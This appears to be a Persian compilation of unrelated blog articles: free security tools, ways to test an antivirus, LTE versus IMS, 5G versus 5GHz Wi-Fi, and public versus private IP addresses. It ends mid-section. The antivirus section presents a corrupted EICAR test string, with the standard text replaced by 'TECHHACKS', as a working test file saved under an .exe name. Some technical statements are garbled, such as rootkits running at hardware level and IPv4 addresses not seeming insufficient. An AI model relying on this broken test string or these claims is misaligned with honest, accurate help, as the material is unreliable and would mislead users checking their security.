مدیر مهندسی نرم‌افزار هدایت و راهبری تیم توسعه، تحقیق و تست نرم‌افزار شرکت را به‌عهده دارد. در تمام شرکت‌هایی که کسب‌وکار آن‌ها در حوزه ساخت یا نگهداری نرم‌افزار است مدیر مهندسی نرم‌افزار یکی از شغل‌های بسیار حیاتی و مهم است.

 

۵ ابزار مهم امنیتی که باید در سیستم خود داشته باشید!!!!!!!!!!!!!!

امنیت آنلاین بسیار مهم است، اما آیا شما ابزارهای مناسب برای رعایت امنیت را دارید؟ حمله‌های آنلاین مختلف هر روز میلیون‌ها رایانه را در سراسر دنیا هدف قرار می‌دهند. گرچه آنتی‌ویروس‌های استاندارد خوب هستند؛ اما نمی‌توانند همه انواع تهدیدها را پوشش دهند. ابزارهای امنیتی رایگان زیر برای بهبود امنیت سیستم و شبکه استفاده می‌شوند. احتمالاً تاکنون حتی نام آن‌ها را نیز نشنیده‌اید؛ اما برای حفظ امنیت آنلاین شما ضروری هستند.

چرا تاکنون نامی از این ابزارها نشنیده‌ایم؟

شاید فکر کنید یک نرم‌افزار امنیت آنلاین و آنتی‌ویروس به روز دارید و بنابراین به ابزارهای اضافی نیاز ندارید.

اما باید توجه داشت باشید که آنتی‌ویروس‌ها نمی‌توانند همه اجزای امنیت رایانه شما را تأمین کنند. آن‌ها در برابر ویروس‌ها، بدافزارها و حتی باج‌افزارها عملکرد مناسبی هستند و فایروال خوبی ارائه می‌دهند؛ اما این ابزارها در یک کلام همه‌کاره‌ی هیچ‌کاره هستند.

چه یک نرم‌افزار امنیت جامع روی سیستم خود نصب کرده باشید و چه هیچ ابزار امنیتی نداشته باشید، در هر صورت می‌بایست ابزارهایی که در ادامه معرفی می‌کنیم را نصب کنید و از مزیت‌های آن‌ها بهره‌مند شوید:

  • InSpectre: این ابزار آسیب‌پذیری Spectre را روی سیستم بررسی می‌کند.
  • Angry IP Scanner: شبکه را در برابر دسترسی‌های غیرمجاز و استفاده‌های سنگین پهنای باند بررسی می‌کند.
  • Cybereason RansomFree: فعالیت باج‌افزارها را بر روی سیستم بررسی می‌کند.
  • Disconnect: اتصال‌های ورودی به مرورگر را رصد می‌کند.
  • Malwarebytes Anti-Rootkit: روت‌کیت‌‌های خطرناک را حذف و آسیب‌هایی که ایجاد کرده‌اند را ترمیم می‌کند.

در ادامه هر یک از ابزارهای فوق را معرفی کرده و دلیل استفاده از هریک را علاوه بر نرم‌افزارهای امنیتی موجود شما توضیح می‌دهیم.

1. نرم‌افزار InSpectre

احتمالاً تاکنون در مورد باگ‌های Spectre و Meltdown چیزهایی شنیده‌اید. این آسیب‌پذیری‌ها در سطح سی‌پی‌یو امکان سوءاستفاده‌هایی را فراهم می‌سازند که هم اینک در سطح تئوری باقی مانده‌اند. رایانه‌های کمی هستند که در برابر این باگ‌ها مصون باشند و وصله‌ها و به‌روزرسانی‌های امنیتی سیستم‌عامل تنها می‌تواند فرایند آسیب‌پذیری را کندتر کند.

به طور خلاصه این باگ‌ها وضعیت بغرنجی ایجاد کرده‌اند. با این که مایکروسافت ابزار خاص خود برای بررسی آسیب‌پذیری‌های اسپکتر/مِلت‌داون را معرفی کرده است، اما استفاده از آن دشوار است. در اینجا است که می‌توان از ابزار InSpectre استفاده کرد که طوری طراحی شده است تا وضعیت کنونی هر سیستم را مشخص کند تا کاربر بتواند اقدامات مناسبی برای به‌روزرسانی سخت‌افزار و نرم‌افزار سیستم جهت بیشترین سطح امنیتی و عملکردی انتخاب کند.

استفاده از InSpectre آسان است و به روش سرراستی تعیین می‌کند که آیا سی‌پی‌یو در برابر هر نوع باگ آسیب‌پذیر است یا نه. به علاوه InSpectre در صورت عرضه هر گونه وصله امنیتی یا به‌روزرسانی به شما اطلاع‌رسانی می‌کند. شما حتی می‌تواند این حفاظت را غیرفعال کنید؛ اما این کار مگر در صورتی که مشکلات عملکردی حادی در سطح سیستم رخ داده باشد، کار غیرعاقلانه‌ای محسوب می‌شود. اگر غیرفعال سازی این نرم‌افزار باعث روان‌تر شدن عملکرد سیستم شده است، احتمالاً زمان آن رسیده است که سخت‌افزار رایانه خود را ارتقا دهید.

این نرم‌افزار را می‌توانید از اینجا دانلود کنید. اگر فکر می‎کنید لازم است سیستم خود را ارتقا بدهید، پیشنهاد می‌کنیم مطلب «راهنمای تعویض مادربورد و سی‌پی‌یو به زبان ساده» را مطالعه کنید.

2. نرم‌افزار Angry IP Scanner

اگر یک مودم از هر نوع در خانه خود دارید، این نرم‌افزار با بیش از 23 میلیون دانلود یکی از نرم‌افزارهایی است که حتماً باید روی سیستم‌عامل ویندوز، مک، و یا لینوکس خود داشته باشید.

این نرم‌افزار رایگان و متن‌باز، شبکه‌های محلی را با استفاده از رنج آی‌پی‌هایی که شما تعریف کرده‌اید، اسکن می‌کند. سپس آدرس‌های آی‌پی، پینگ می‌شوند و داده‌هایی در مورد هر ابزاری که پاسخ می‌دهد، گردآوری می‌شود. نتایج اسکن را می‌توان به صورت یک فایلی متنی و همچنین فایل XML و CSV ذخیره کرد که برای استفاده‌های بعدی مفید خواهد بود.

برای نمونه این نرم‌افزار اعلام می‌کند که چه دستگاه‌هایی روی شبکه شما فعال هستند. اگر مشکوک هستید که یکی از همسایگان‌تان از شبکه شما استفاده می‌کند، می‌توانید با استفاده از این نرم‌افزار، این موضوع را بررسی کنید. باید توجه داشته باشید که کشف رمز شبکه شما برای هر یک از همسایگان کنجکاوتان کار چندان دشواری محسوب نمی‌شود.

این نرم‌افزار بر روی جاوا عمل می‌کند و بنابراین باید اطمینان حاصل کنید که نسخه به روزی از جاوا را نصب کرده‌اید. جاوا خود برخی مسائل امنیتی دارد که به‌روزرسانی‌های مداوم، شما را از رفع آن‌ها مطمئن می‌سازد.

این نرم‌افزار را از اینجا می‌توانید دانلود کنید.

3. برنامه Cybereason RansomFree

آیا تاکنون نام باج‌افزار به گوش‌تان خورده است؟ باج‌افزارها نوعی بدافزار مخرب هستند که سیستم را قفل کرده، داده‌ها را رمزنگاری می‌کنند و شما را وادار می‌کنند تا برای کسب دسترسی مجدد به آن‌ها پولی بپردازید. بدین ترتیب همه داده‌های روی رایانه و احتمالاً حتی داده‌های روی فضای ابری از دسترس شما خارج می‌شوند. چنین وضعیتی برای هر کس می‌تواند فاجعه‌بار باشد، به خصوص اگر اسناد یا عکس‌های مهمی بر روی رایانه خود داشته باشد.

در اغلب موارد پرداخت باج به صاحبان باج‌افزار باعث می‌شود که واقعاً داده‌های شما طبق قول آن‌ها آزاد شود؛ اما این افراد همیشه هم خوش‌قول نیستند. برای برخی از باج‌افزارها، ابزارهای حذف باج‌افزار ارائه شده است؛ اما برخی دیگر چنین امکانی ندارند، بنابراین باید پیش از وقوع حادثه در فکر چاره بود.

بر اساس اعلام وب‌سایت رسمی، ابزار RansomFree from Cybereason شما را در برابر 99 درصد از باج‌افزارها حفاظت می‌کند. این باج‌افزارها شاملBad Rabbit، NotPetyaو WannaCry هستند. این ابزار برای نسخه‌های 7 به بعد ارائه شده است و برخی فایل‌های «canary» ایجاد می‌کند که رفتار باج‌افزار را تشخیص می‌دهد. این فایل‌ها در جاهایی قرار می‌گیرند که باج‌افزارها معمولاً از آنجا شروع به کار می‌کنند و بدین ترتیب در مراحل اولیه، از رمزنگاری فایل‌ها توسط باج‌افزار جلوگیری می‌کند. خوشبختانه این نرم‌افزار طوری طراحی شده است که در کنار دیگر نرم‌افزارهای امنیتی نیز می‌تواند کار کند.

ابزار RansomFree from Cybereason را از اینجامی‌توانید دانلود کنید.

4. افزونه Disconnect

زمانی که به مرور وب می‌پردازید، تنها وب‌سایت‌هایی که مشغول بازدید از آن‌ها هستید به رایانه شما وصل نمی‌شوند. نرم‌افزارهای تبلیغاتی، تحلیلی، شبکه‌های اجتماعی و موارد بسیار دیگری نیز هستند که مرور شما را ردگیری می‌کنند. با افزونه دیسکانکت برای مرورگر، می‌توانید دریابید که چه نرم‌افزارهایی شما را ردگیری می‌کنند و با آن مقابله کنند.

دیسکانکت با مشخص ساختن و مسدودسازی وب‌سایت‌هایی که شما را ردگیری می‌کنند، می‌تواند تا 44 درصد مرورگر شما را سریع‌تر کند. مهم‌تر از آن، این است که دیسکانکت باعث می‌شود امنیت آنلاین شما بیشتر شود. با این که عموماً توصیه نمی‌شود همه نرم‌افزارهای تبلیغاتی را مسدود کنید؛ اما دیسکانکت می‌تواند ردگیرهای ناپیدایی که با شبکه‌های تبلیغاتی یا شبکه‌های اجتماعی ارتباطی ندارند را مسدود سازد.

دیسکانکت یک گزینه فهرست سفید دارد که تضمین می‌کند مواردی که می‌خواهید دانلود کنید کماکان در دسترس شما قرار دارند. در همین صفحه می‌توان شبکه‌های اجتماعی یا هر نوع ردگیر ناشناس را مسدود کرد.

این نرم‌افزار را می‌توانید از اینجا برای کروم، فایرفاکس،اپرا یا سافاری به صورت رایگان دانلود کنید.

5. نرم‌افزار Malwarebytes Anti-Rootkit

روت‌کیت‌ها می‌توانند خطرناک باشند: روت‌کیت‌ها بدافزارهای قدرتمندی هستند که می‌توانند نرم‌افزارهای آنتی‌ویروس را ببندند و به حمله‌کننده‌ها دسترسی‌هایی در سطح مدیر سیستم بدهند تا کنترل کاملی روی سیستم داشته باشند. روت‌کیت‌ها در سطح سخت‌افزاری عمل می‌کنند.

این بدان معنی است که آن‌ها می‌توانند کنترل بایوس سیستم و همچنین سیستم‌عامل را به دست گیرند. چند راه‌حل برای مقابله با روت‌کیت‌ها وجود دارند؛ اما از میان راه‌حل‌های مؤثر، بهترین گزینه Malwarebytes Anti-Rootkit (MBAR) است. این نرم‌افزار پس از نصب شروع به اسکن کردن رایانه شما کرده و تهدیدها را شناسایی می‌کند. دکمه پاک‌سازی (Cleanup) به ابزار دستور می‌دهد تا با هر نوع تهدیدی مقابله کند و در زمان ری‌استارت رایانه شروع می‌شود.

این نرم‌افزار هم اینک به صورت نسخه بتا منتشر شده است، Malwarebytes Anti-Rootkit هنوز از سوی توسعه‌دهندگان به طور کامل پشتیبانی نمی‌شود. با این حال اگر در مورد روت‌کیت‌ها نگران هستید، این نرم‌افزار بهترین نقطه شروع محسوب می‌شود.

این نرم‌افزار را می‌توانید از اینجا دانلود کنید.

سخن پایانی

آیا سیستم شما واقعاً به آن اندازه که فکر می‌کنید امن هست؟ شبکه خانگی شما آسیب‌پذیری‌هایی دارد که شاید در مورد آن‌ها اطلاعاتی نداشته باشید. باگ Spectre می‌تواند به طور غیرمنتظره به دستگاه شما آسیب بزند. فعالیت‌های آنلاین نیز همیشه با ریسک مواجهه با بدافزارها همراه بوده است.

این ابزارها رایگان هستند و استفاده از آن‌ها آسان است. این نرم‌افزارها می‌توانند از مشکلات زیادی جلوگیری کنند. آن‌ها را می‌تواند همراه با یک VPN مؤثر و نرم‌افزار امنیتی جامع مانند اسمارت‌سکوریتی استفاده کنید تا بیشترین امنیت آنلاین را برای شما به ارمغان بیاورند.

آنتی ویروسی که درسیستم خود نصب نموده اید تاچه اندازه کارآیی دارد؟؟؟؟؟؟

در این مقاله ترفند ساده‌ای را با شما در میان می‌گذاریم که به‌کمک آن می‌توانید به‌سادگی قابلیت‌ها و توانایی‌های آنتی‌ویروس خود را چک کنید. برای آن‌که مطمئن شوید نرم‌افزار آنتی‌ویروسی که روی سیستم خود نصب کرده‌اید بدون نقص کار می‌کند این مطلب را دنبال کنید.

استفاده از آنتی‌ویروس روی لپ‌تاپ و پی‌سی یکی از ملزومات این روزهای دنیای فناوری است. آنتی‌ویروس‌های زیادی در دسترس هستند که با اسکن کردن دستگاه و پیدا کردن ویروس‌ها، آن‌ها را از بین می‌برند. ولی ویروس‌ها با گذشت زمان پیشرفته‌تر و قوی‌تر می‌شوند. پس آیا آنتی‌ویروسی که شما از آن استفاده می‌کنید قدرت شناسایی ویروس‌های توسعه یافته‌ای که هر روز در حال تولید هستند را دارد؟

شاید بد نباشد با بررسی آنتی‌ویروس‌هایی که روی دستگاه‌های مورد استفاده نصب کرده‌ایم از امکانات و قابلیت‌های آن‌ها آگاه شویم. برایم مطلع شدن از این موضوع ترفندهایی وجود دارد که در این مقاله به‌بررسی بهترین‌های آن‌ها می‌پردازیم.

چگونه مطمئن شویم آنتی‌ویروسی که استفاده می‌کنیم بدون نقص انجام وظیفه می‌کند

روش کار بسیار ساده و مبتنی بر یک ترفند آسان مربوط به نت‌پد است.

روش اول- بررسی آنتی‌ویروس

گام اول- در ابتدا روی Start کلیک کنید و بعد از تایپ کردن عبارت notepad کلید Enter را فشار دهید.

گام دوم- بعد از این‌که نت‌پد باز شد کد زیر را کپی و در آن پیست کنید.

*X5O!P%@AP[4PZX54(P^)7CC)7}$TECHHACKS-ANTIVIRUS-TEST-FILE!$H+H

گام سوم- در این مرحله فایل ایجاد شده را با نام Techviral Antivirus Testing File.exe ذخیره کنید.

حالا زمان آن رسیده تا این فایل را با آنتی‌ویروس سیستم خود چک کنید و ببینید که این نرم‌افزار توانایی شناسایی دارد یا نه. اگر آنتی‌ویروس موفق به‌شناسایی شد یعنی این‌که به‌خوبی کار می‌کند. در غیر این‌صورت شک نکنید که باید در اسرع وقت آنتی‌ویروس سیستم را به‌روزرسانی کنید.

روش دوم- بررسی آنتی‌ویروس به‌همراه تست امنیت اینترنت

برای این کار باید از یک سایت آنلاین بازدید کنید. کافی است یکی از فایل‌های تست امنیت را از این سایت دانلود کنید. اگر آنتی‌ویروسی که روی سیستم نصب کرده‌اید جلوی دانلود فایل را بگیرد یعنی این‌که نرم‌افزار به‌خوبی در حال محافظت از دستگاه است ولی اگر بدون کوچک‌ترین مشکلی موفق به‌دانلود این فایل‌ها شدید یعنی آنتی‌ویروس شما شرایط لازم برای محافظت از دستگاه را ندارد.

گام اول- به وبسایت Eicar (مؤسسه اروپایی در خصوص تحقیق آنتی‌ویروس کامپیوتر) مراجعه کنید و روی اینلینک کلیک کنید.

گام دوم- به پایین صفحه بروید تا گزینه‌ای تحت عنوان “Download area using the standard protocol HTTP” پیدا کنید. می‌توانید هر کدام از فایل‌هایی که در اینجا وجود دارد را دانلود کنید. بعد از دانلود، اگر آنتی‌ویروس هشدار امنیتی بدهد یعنی این‌که به‌خوبی کار می‌کند. 

این سایت 4 فایل را برای دانلود در اختیار کاربر می‌گذارد. اولین فایل، eicar.com، حاوی یک رشته ASCII که در بالا اشاره شد است. دومین فایل، eicar.com.txt، یک کپی از این فایل اما با نامی متفاوت است. برخی از خوانندگان گفته‌اند که در هنگام دانلود فایل اول مشکلاتی داشته‌اند، اما با دانلود فایل دوم نباید مشکلی وجود داشته باشد. کافی است این فایل را دانلود کنید و سپس نام آن‌را به eicar.com تغییر دهید. سومین فایل حاوی فایل تست در داخل یک پوشه zip است. یک آنتی‌ویروس خوب و قوی باید بتواند "ویروس" داخل فایل‌های zip را شناسایی کند. و آخرین فایل یک فایل zip است که این‌بار فایل سوم داخل آن قرار گرفته است. این کار به‌شما نشان می‌دهد که آیا آنتی‌ویروس قادر به تشخیص ویروس در سطوح پایین‌تر هست یا این‌که بعد از سطح اول قادر به‌شناسایی ویروس در سطوح بعدی نیست.

روش سوم- استفاده از TestMyAv

سایت TestMyAv تنها یک هدف دارد: ارائه امکانات به‌کاربران برای تست راه‌کارهای ضد بدافزار تا دیگر نیازی به فروشندگان، شرکت‌های تست کننده و نمایندگی‌های این نرم‌افزارها نداشته باشند. در این وبسایت ویروس‌ها و بدافزارهایی برای دانلود قرار دارد که آنتی‌ویروس سیستم شما را تست می‌کنند. همیشه با تست ابتدایی و بیسیک شروع کنید.

وقتی وارد سایت شدید صفحه “Testing Guide” را پیدا کنید و با دانلود بدافزارها کار تست آنتی‌ویروس را آغاز کنید.

روش چهارم - تست‌های Comodo Leaks

این روش یکی از بهترین ابزارهای تست نفوذ یا نشتی است. بهترین ویژگی Comodo Leak Tests آن است که توسط شرکت COMODO که یکی از پیشروان حوزه امنیت است پشتیبانی می‌شود. وظیفه این ابزار تست حفره‌های موجود در دیواره‌های آتش و برنامه HIPS است. برای این منظور جمعا 34 تست مختلف از جمله نصب rootkit، ارسال اطلاعات و هم‌چنین تزریق انجام می‌شود. در نتیجه، اگر آنتی‌ویروس شما قدرت کافی داشته باشد می‌تواند جلوی اجرای تست توسط ابزار Comodo Leak Tests را بگیرد. با این کار می‌توانید متوجه شوید که آنتی‌ویروس تا چه حد توانایی دارد.

روش پنجم- استفاده از Secunia Personal Software Inspector

ابزار Secunia Personal Software Inspectorیا Secunia PSI ابزاری فوق‌العاده قدرتمند است که همه کاربران باید از آن روی سیستم‌های خود استفاده کنند. هدف نهایی Secunia PSI بررسی این مورد است که نرم‌افزار نصب شده بر روی سیستم به‌روزرسانی شده هست یا این‌که به وصله امنیتی نیاز دارد. در واقع این ابزار مطمئن می‌شود که آنتی‌ویروس توانایی شناسایی و توقف آخرین و جدیدترین ویروس‌ها و تهدیدهای امنیتی را داشته باشد. بنابراین، این ابزار برای تست آنتی‌ویروس نیست اما می‌تواند به نرم‌افزار کمک کند تا قابلیت‌ها و توانایی‌های بیشتری داشته باشد.

اگر نرم‌افزار بازیابی اطلاعات دارید لازم نیست نگران از دست رفتن آن‌ها باشید. با استفاده از EaseUS Data Recovery Wizard همه آن‌ها را بازگردانید.

مقایسه وتفاوت IMS-LTE

LTE (Long Term Evolution) و IMS (IP Multimedia Subsystems) فناوری‎هایی هستند که برای نسل بعدی خدمات پهن باند موبایل توسعه پیدا کرده‎اند. در واقع LTE یک فناوری پهن باند بی‎سیم است که برای پشتیبانی از دسترسی به اینترنت رومینگ با استفاده از تلفن موبایل توسعه داده شده است. IMS نیز بیشتر نوعی چارچوب معماری است که برای پشتیبانی از خدمات ای‎پی چند رسانه‎ای طراحی شده و مدت زمانی است که به ارائه خدمت می‌پردازد.

فناوری LTE چیست؟

Long Term Evolution یا به اختصار LTE یک فناوری پهن باند بی‎سیم است که توسط Third Generation Partnership Project (3GPP) توسعه داده شده است تا به توان عملیاتی بالاتر از نسل UMTS 3G دست پيدا کند.

این فناوری به این دلیل Long Term Evolution یا تکامل بلند مدت نامگذاری شد، زیرا توانست به یک جایگزین موفق و مسلم از فناوری‎های UMTS 3G مبتنی بر GSM تبدیل شود. به همین دلیل این فناوری به عنوان فناوری نسل چهارم یا 4G در نظر گرفته شد. LTE با قابلیت فراهم کردن میانگین سرعت دریافت 100 مگابيت در ثانیه و سرعت ارسال 30 مگابيت در ثانیه توانسته است به میزان قابل ملاحظه‎ای سقف نرخ انتقال داده را افزایش دهد. اصلاحات بزرگ ساختاری، ظرفیت پهنای باند گسترش پذیر و کاهش زمان تاخیر به ارائه خدماتی باکیفیت کمک بزرگی کرده است. علاوه بر این، سازگاری با فناوری قدیمی‌تر GSM و UMTS امکان مهاجرتی روان و بی دردسر به فناوری 4G را فراهم کرده است. توسعه‎های آتی LTE نیز قصد دارد توان عملیاتی را تا 300 مگابيت در ثانیه افزایش دهد.

پروتکل لایه ترنسپورت استفاده شده توسط تمام لایه‎های بالایی LTE بر پایه TCP/IP استوار است. LTE از تمامی‌ انواع داده اعم از صوت، تصویر و متن پشتیبانی می‌کند. فناوری تسهیم (multiplexing) به کار رفته در LTE از نوع OFDM (Orthogonal Frequency Division Multiplexing) است و در جدیدترین نسخه از MIMO (Multiple Input Multiple Output) استفاده  شده است. LTE از UMTS Terrestrial Radio Access Network (E-UTRAN) به عنوان رابط هوایی برای ارتقای قابلیت دسترسی شبکه‎های موجود تلفن همراه استفاده می‌کند. E-UTRAN نیز یک استاندارد شبکه دسترسی رادیویی است که به منظور جایگزینی با فناوری‎های UMTS, HSDPA و HSUPA که پیش از این برای نسخه‎های 3GPP در نظر گرفته شده بود معرفی شده است.

معماری مبتنی بر IP ساده‎ای که در LTE استفاده می‌شود، هزینه‎های عملیاتی و نگهداری را پایین‎تر آورده است و به میزان قابل توجهی ظرفیت سلول E-UTRAN نیز افزایش پیدا کرده است.

فناوری IMS چیست؟

IMS در ابتدا به طور ویژه برای کاربردهای موبایل توسط 3GPP و 3GPP2 ساخته شده بود. اما از آنجا که ارائه کنندگان خط ثابت مجبور به پیدا کردن راهکارهایی برای ادغام فناوری‎های مرتبط با موبایل در شبکه‎های خود بودند، این روزها این فناوری در بین این خدمات دهندگان نیز بسیار محبوبیت و گسترش پیدا کرده است. IMS در اصل از طریق زیرساخت‎های مبتنی بر IP همگرایی بین داده، گفتار و فناوری شبکه موبایل را فراهم می‌کند. امکانات ضروری IMS از قبیل کنترل خدمات، امکانات امنیتی مثل احراز هویت و مجوز دسترسی، مسیریابی، ثبت نام، آبونمان، فشرده سازی SIP و پشتیبانی از QOS نیز توسط این فناوری فراهم می‌شود.

IMS را می‌توان با معماری لایه‎ای آن که شامل بسیاری از لایه‎ها با ویژگی‎های مختلف است تجزیه و تحلیل کرد. این معماری قابلیت استفاده مجدد از خدمات و بسیاری دیگر از کاربردهای رایج را فراهم می‌کند. مسئولیت اولین لایه تفسیر کردن حامل و کانال سیگنال از مدار سویچ موجود در شبکه‎ها برای ارسال بسته و کنترل جریان داده است. کاربرد لایه دوم نیز فراهم کردن عملکردهای رسانه‎ای سطح ابتدایی برای کاربردهای سطح بالاتر است.

معماری IMS این فرصت را برای تامین کنندگان خدمات فراهم می‌کند تا با کاهش هزینه‎های عملیاتی را از طریق خطوط سیمی‌، بی‎سیم و شبکه‎های پهن باند خدمات جدید و بهتری را عرضه کنند.

چه تفاوتی بین IMS و LTE وجود دارد؟

  • LTE و IMS اجزای کلیدی مشابه‎ای از قبیل Home Subscriber Server (HSS) و سیاست گذاری و همین‎طور Charging Rule Function (PCRF) دارند.
  • هم IMS Domain و هم LTE Domain از شبکه‎های WCDMA پشتیبانی می‌کنند.
  • IMS Domain به نسبت LTE Domain برای برقراری تماس‎های VoIP کاربردی‎تر است.
  • LTE از تماس‎های Circuit Switching پشتیبانی نمی‌کند، به همین دلیل برای راه اندازی تماس‎های صوتی در دامنه CS استفاده از IMS Domain بسیار مفیدتر خواهد بود.
  • LTE به نسبت IMS هزینه‎های تمام شده برای هر مگابایت و همچنین فرکانس و شدت تراکم شبکه را با ارائه سرعت بیشتر به منظور ارتقای سطح تجربه کاربری کاهش می‌دهد.

تفاوت5G_5GHZ wi-Fi چیست؟؟؟

5G و 5GHz Wi-Fi هر دو برای اتصال بیسیم استفاده می‌شوند، اما غیر از این هیچ تشابه دیگری باهم ندارند. 5G یک استاندارد مخابراتی جدید است که بعد از 4G LTE و 3G معرفی شده است، اما 5GHz یکی از دو باند فناوری وای فای است که نسبت به باند دوم (2.4 گیگاهرتز) از سرعت بیشتر و تداخل کمتری برخوردار است.

5G  یک استاندارد مخابراتی جدید است

5G  اصطلاحی است که احتمالا این روزها خیلی آن را می‌شنوید. این یک استاندارد مخابراتی جدید است که بعد از  4G LTEو 3G معرفی شده است. 5G به معنای نسل پنجم است و به پنجمین نسل از استاندارد مخابرات سیار اشاره دارد.

5G  طراحی شده است تا از 4G LTE سریع‌تر بوده و زمان تاخیر کمتری داشته باشد. احتمالا شما در سال 2019 شاهد اولین تلفن‌های هوشمند مجهز به 5G خواهید بود و در ابتدا شرکت‌های مخابراتی بزرگ و مطرح جهان مثل AT&T, T-Mobile, Sprint و Verizon شبکه‌های موبایل 5G خود را راه اندازی خواهند کرد. همچنین 5G با ارائه خدمات اینترنت بی‌سیم پرسرعت اتصال اینترنت خانگی شما را به یک اتصال اینترنت سیار تبدیل می‌کند.

در حالی که 5G یک استاندارد جدید هیجان انگیز است، اما هیچ ربطی به وای‌فای ندارد. 5G برای اتصالات مخابرات سیار استفاده می‌شود. در آینده ممکن است تلفن‌های هوشمند هم از 5G و هم 5 GHz Wi-Fi پشتیبانی کنند، اما در حال حاضر تلفن‌های هوشمند از 4G LTE و 5 GHz Wi-Fi پشتیبانی می‌کنند.

5GHz  یکی از دو باند وای‌فای است

فناوری وای‌فای از دو باند فرکانسی 2 و 5 گیگاهرتز تشکیل شده است که شما می‌توانید از آن استفاده کنید. 5 گیگاهرتز جدیدتر است و بعد از معرفی استاندارد 802.11n Wi-Fi در سال 2009 مورد استفاده قرار گرفت. این باند هنوز هم بخشی از استانداردهای مدرن وای‌فای مثل  802.11ac و Wi-Fi 6 است.

5 GHz Wi-Fi کانال‌های بیشتری را برای جلوگیری از تداخل امواج شبکه‌های مختلف ارائه می‌کند و در نتیجه تراکم کمتری دارد و برای استفاده در مجتمع‌های مسکونی پر تراکم که هر آپارتمان روتر و شبکه وای‌فای مختص خود را دارد بسیار ایده‌ال است. همچنین باند 5 گیگاهرتز سریع‌تر از باند 2.4 گیگاهرتز است.

با تمام این تفاصیل شبکه وای‌فای 2.4 گیگاهرتز هنوز مزایای خاص خود را دارد. 2.4 گیگاهرتز به واسطه استفاده از امواج رادیویی طولانی‌تر محدوده گسترده‌تری را به نسبت 5 گیگاهرتز تحت پوشش قرار می‌دهد و راحت‌تر از بین موانع و دیوارها عبور می‌کند.

اگر از یک روتر نسبتا جدید و پیشرفته استفاده می‌کنید احتمالا از یک روتر دو بانده برخوردار هستید که از هر دو باند 5 و 2.4 گیگاهرتز به طور همزمان پشتیبانی می‌کند.

افرادی هستند که از اصطلاح 5G Wi-Fi برای اشاره به وای‌فای 5 گیگاهرتز (5GHz Wi-Fi) استفاده می‌کنند که نادرست است.

تفاوت اصلی آی پی خصوصی با آی پی عمومی در چیست؟؟؟؟؟

همان‎گونه که از نام آنها مشخص است، تفاوت اصلی بین آی‌پی عمومی‎ و آی‌پی خصوصی در شبکه‎ای است که آنها استفاده می‎کنند. آی‌پی‌‎های عمومی‎ که در تمام اینترنت یکتا هستند، به دستگاه‌ها اجازه می‎دهند تا به اینترنت متصل شوند. برای مديريت یکتایی آنها، واگذاری آنها از طریق یک سازمان و به صورت متمرکز سازماندهی و انجام می‎شود. آدرس‌های آی‌پی خصوصی در شبکه‎های خصوصی استفاده می‎شوند که یا به اینترنت متصل نیستند و یا از طریق NAT به اینترنت متصل می‎شوند.

قبل از این که به جزئیات بیشتر در این رابطه بپردازیم باید بدانید که یک آدرس آی‌پی یا Internet Protocol address یک شناسه یکتا و منحصر به فرد است که برای قابلیت شناسایی هر دستگاه موجود در یک شبکه به آن اختصاص داده می‎شود. این کار به هر دستگاه موجود در شبکه اجازه می‎دهد تا به طور منحصر به فرد قابل شناسایی باشد. دو دسته از این آدرس‌های آی‌پی وجود دارد که با نام‎های آی‌پی عمومی‎ (public IP) و آی‌پی خصوصی (private IP) شناخته می‎شوند. آی‌پی عمومی‎ که در تمام اینترنت یکتا هستند، به دستگاه‌ها اجازه می‎دهند تا به اینترنت متصل شوند. برای مديريت یکتایی آنها، واگذاری آنها از طریق یک سازمان و به صورت متمرکز سازماندهی و انجام می‎شود. آدرس‌های آی‌پی خصوصی در شبکه‎های خصوصی استفاده می‎شوند که یا به اینترنت متصل نیستند و یا از طریق NAT به اینترنت متصل می‎شوند. در اینجا یکتا بودن این آدرس‌ها در سطح همان شبکه خصوصی کفایت می‎کند و از این رو می‎توان از محدوده آدرس‌های یکسان در شبکه‎های خصوصی مختلف که از یک دیگر جدا هستند استفاده کرد. آدرس‌های آی‌پی نسخه 4 در محدوده‎های 10.0.0.0 تا 10.255.255.255 و 172.16.0.0 تا 172.31.255.255 و از 192.168.0.0 تا 192.168.255.255 برای آدرس‌های خصوصی رزرو شده‎اند و باقی آنها برای آی‌پی‌‎های عمومی‎ هستند.

آی‌پی عمومی(public IP) چیست؟

آدرس آی‌پی عمومی‎ به صورت جهانی و در کل اینترنت یکتا و منحصر به فرد است. در استاندارد محدوده آدرس‌های آی‌پی مشخصی برای استفاده در شبکه‎های خصوصی در نظر گرفته شده است. هر آی‌پی که به عنوان آی‌پی خصوصی رزرو نشده باشد را می‎توان به عنوان آی‌پی عمومی‎ استفاده کرد. یک شبکه آی‌پی باید برای هر کدام از دستگاه‌های خود از یک آی‌پی منحصر به فرد استفاده کند. از آنجا که اینترنت هم یک شبکه آی‌پی است، برای جلوگیری از استفاده شدن یک آی‌پی یکسان برای چند دستگاه مختلف باید آدرس‌های آی‌پی به درستی نگهداری شوند. این مدیریت آدرس‌های آی‌پی توسط سازمانی به نام Internet Assigned Numbers Authority یا به اختصار IANA انجام می‎شود و آنها هستند که محدوده‎های آی‌پی را به سازمان‎های مختلف اختصاص ميدهند. وقتی این آدرس‌های آی‌پی به روترهای اینترنت اختصاص داده می‎شوند باید به شکلی پیکربندی شوند تا دستگاه‌های موجود در اینترنت بتوانند به آنها دسترسی داشته باشند. به این شكل تمام آدرس‌های آی‌پی عمومی‎ اختصاص داده شده به صورت سراسری قابل مسیریابی هستند. محدوده‎های آدرس آی‌پی هم برای Internet Protocol version 4 (IPv4) و هم برای Internet Protocol version 6 (IPv6) موجود هستند. IP version 4 مجموعه عظیمی‎ از آدرس‌های آی‌پی را فراهم می‎کند، اما تعداد دستگاه‌های موجود در اینترنت به حدی زیاد شده است که امروز دیگر ناکافی به نظر نمی‎رسد. به همین دلیل IPv6 که می‎تواند آدرس‌های آی‌پی بسیار بیشتری را در مقايسه با IPv4 فراهم کند معرفی و در حال استفاده است.

آدرس آی‌پی خصوصی (private IP) چیست؟

